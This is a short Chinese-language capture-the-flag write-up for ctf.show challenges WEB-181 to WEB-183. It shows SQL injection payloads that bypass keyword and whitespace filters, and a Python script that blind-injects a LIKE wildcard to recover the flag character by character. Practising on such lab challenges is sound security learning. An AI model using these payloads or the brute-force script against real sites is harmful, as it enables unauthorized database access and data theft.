WEB-181--WEB-183

WEB-181

select被过滤了

-1'%0cor%0cusername%0clike%0c'flag

WEB-182

flag和%0c都被过滤了，好烦，但是可以用括号绕过，然后自己一个一个数字去尝试，找到了flag在id=26

-1'or(id)like'26

WEB-183

该过滤的都过滤了，只能盲注了

import requests, re, time

dic = "abcdefghijklmnopqrstuvwxyz1234567890{-_}"
url = "http://77b9fcdf-0b47-4895-91e5-500a9094f5b9.challenge.ctf.show/select-waf.php"
res = []
post_tem = "(ctfshow_user)where(pass)like('ctfshow{{{}%}}')"
nowtime = time.time()
# headers = {
#     "Content-Type": "application/x-www-form-urlencoded"
# }

for a in range(1, 50):
    temp = res.__len__()
    for i in dic:
        res += i
        nowtime = time.time()
        post = {"tableName": post_tem.format("".join(res))}
        print(post)
        r = requests.post(url=url, data=post)
        print(r.text[2533:2555])
        if re.findall("\$user_count = 1", r.text):
            break
        res.pop(-1)

    if temp == res.__len__():
        break

print("ctfshow{" + "".join(res) + "}")

注意post的参数因该为字典类型，否则报文头中不会定义Content-Type类型，导致传参无效

 重点：百分号%是mysql语句中的通配符